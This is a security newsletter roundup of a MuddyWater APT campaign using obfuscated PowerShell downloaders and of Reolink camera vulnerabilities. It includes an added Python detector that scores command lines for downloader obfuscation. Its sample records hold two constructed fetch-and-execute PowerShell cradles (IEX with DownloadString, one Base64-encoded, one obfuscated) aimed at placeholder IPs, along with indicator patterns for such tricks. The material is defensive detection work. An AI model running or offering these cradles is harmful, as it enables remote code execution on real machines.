SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: New insight into recently unmasked MuddyWater APT
Description: Cisco Talos has observed a new campaign targeting Turkish private organizations and governmental institutions. Talos attributes this campaign with high confidence to MuddyWater, an APT group that U.S. Cyber Command recently attributed to Iran's Ministry of Intelligence and Security (MOIS). The campaign uses malicious PDFs, XLS files and Windows executables to deploy obfuscated PowerShell-based downloaders that serve as the initial foothold in the target's environment. MuddyWater's reliance on script-based components such as these downloaders is also a tactic described in the January 2022 disclosure by U.S. Cyber Command. The campaign additionally uses canary tokens (URLs that alert their owner when they are fetched) to track successful infections, a new addition to the group's tactics, techniques and procedures (TTPs). The way canary tokens are used in this campaign may also serve to evade sandbox-based detection systems.
References: https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
SNORT® SIDs: 58929 - 58938
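The roundup entry above describes obfuscated PowerShell downloaders as the initial foothold. The following is an added detection example for this newsletter, not Talos code and not derived from the campaign's indicators: it scores process command lines for generic PowerShell downloader-and-obfuscation traits (an -EncodedCommand payload, download cradles, backtick-split cmdlet names, string concatenation, stealth switches). The sample records, hosts and IP addresses are constructed for illustration; the weights and threshold are assumptions to tune against your own telemetry.

```python
"""Heuristic triage of PowerShell command lines for downloader-style
obfuscation, run over constructed process-creation records.

Added example for the MuddyWater roundup entry. Not Talos code; the rules are
generic PowerShell-abuse heuristics, not indicators tied to that campaign, and
every sample command line below is constructed.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload
# is Base64 over UTF-16LE text.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+"
    r"([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)

# Weighted indicators (name, regex, weight); weights are assumed, not measured.
INDICATORS = [
    ("download cradle",
     r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
     r"invoke-restmethod|\birm\b|start-bitstransfer|\bcurl\b|\bwget\b", 3),
    ("in-memory execution", r"invoke-expression|\biex\b|invoke-command|\bicm\b", 2),
    ("base64 payload decode", r"frombase64string", 2),
    ("[char] cast obfuscation", r"\[char\]", 2),
    ("hidden window", r"-w(?:indowstyle)?\s+hidden", 1),
    ("no profile", r"-nop(?:rofile)?\b", 1),
    ("execution policy bypass", r"-e(?:xecutionpolicy|p)\s+bypass", 1),
]
CONCAT_JOIN = re.compile(r"['\"]\s*\+\s*['\"]")   # 'I'+'E'+'X' style joins
BACKTICK_SPLIT = re.compile(r"\w`\w")             # Down`loadString style splits


def encode_powershell(command: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it.
    Used here only to construct a realistic sample record."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell(cmdline: str):
    """Score one command line; returns (score, [reasons])."""
    reasons, score = [], 0
    decoded = decode_encoded_command(cmdline)
    # Drop the raw Base64 blob so its random-looking text is not pattern-matched,
    # then analyse the visible command line and the decoded payload together.
    visible = ENCODED_FLAG.sub(lambda m: m.group(0)[: -len(m.group(1))] + "<blob>", cmdline)
    text = visible + ("\n" + decoded if decoded else "")
    if decoded is not None:
        reasons.append("encoded command")
        score += 2
    # Backticks are PowerShell's escape character; splitting a cmdlet name with
    # them defeats naive substring matches, so count the trick, then strip them.
    if BACKTICK_SPLIT.search(text):
        reasons.append("backtick-split identifiers")
        score += 2
    normalized = text.replace("`", "").lower()
    if len(CONCAT_JOIN.findall(normalized)) >= 2:
        reasons.append("string concatenation")
        score += 2
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, normalized):
            reasons.append(name)
            score += weight
    return score, reasons


def triage(events, threshold=5):
    """Return [(host, score, reasons)] for events at or above the threshold."""
    hits = []
    for host, cmdline in events:
        score, reasons = score_powershell(cmdline)
        if score >= threshold:
            hits.append((host, score, reasons))
    return hits


# Constructed sample records: (host, process command line). Addresses are from
# documentation ranges, not real infrastructure.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(STAGER)),
    ("ws02", "powershell.exe -ep bypass -nop -c \"&('I'+'E'+'X') "
             "(New-Object Net.WebClient).Down`loadString('http://203.0.113.9/p')\""),
    ("ws03", "powershell.exe -NoProfile -File C:\\Scripts\\Backup-Logs.ps1"),
    ("ws04", "powershell.exe -Command \"Get-Service | Where-Object Status -eq 'Running'\""),
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: score {score}: {', '.join(reasons)}")
```

Run against Sysmon event 1 or Windows 4688 command lines; the two constructed downloaders score 9 each while the scheduled script and the interactive query stay below the threshold. Decoding the -EncodedCommand payload before matching is what lets the encoded cradle on ws01 score the same as the plain one on ws02.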
Title: WiFi-connected security camera could be manipulated to spy on communications
Description: Cisco Talos recently discovered several vulnerabilities in the Reolink RLC-410W security camera that could allow an attacker to carry out man-in-the-middle attacks, steal user login credentials and more. The Reolink RLC-410W is a WiFi-connected security camera with motion detection and multiple ways to save and view recordings. The vulnerabilities Talos found exist in various functions and features of the camera, and some of them can be chained to reboot the camera without authentication or to invoke certain APIs. Five denial-of-service vulnerabilities allow an adversary who sends specific network requests to the device to make the web service unresponsive and restart the camera. Two further vulnerabilities can be combined to reformat the camera's memory card, effectively erasing all its recordings.
References: https://blog.talosintelligence.com/2022/01/vuln-spotlight-reolink-cameras.html
SNORT® SIDs: 58691 - 58693, 58698, 58699, 58718, 58817 - 58720 and 58926 - 58928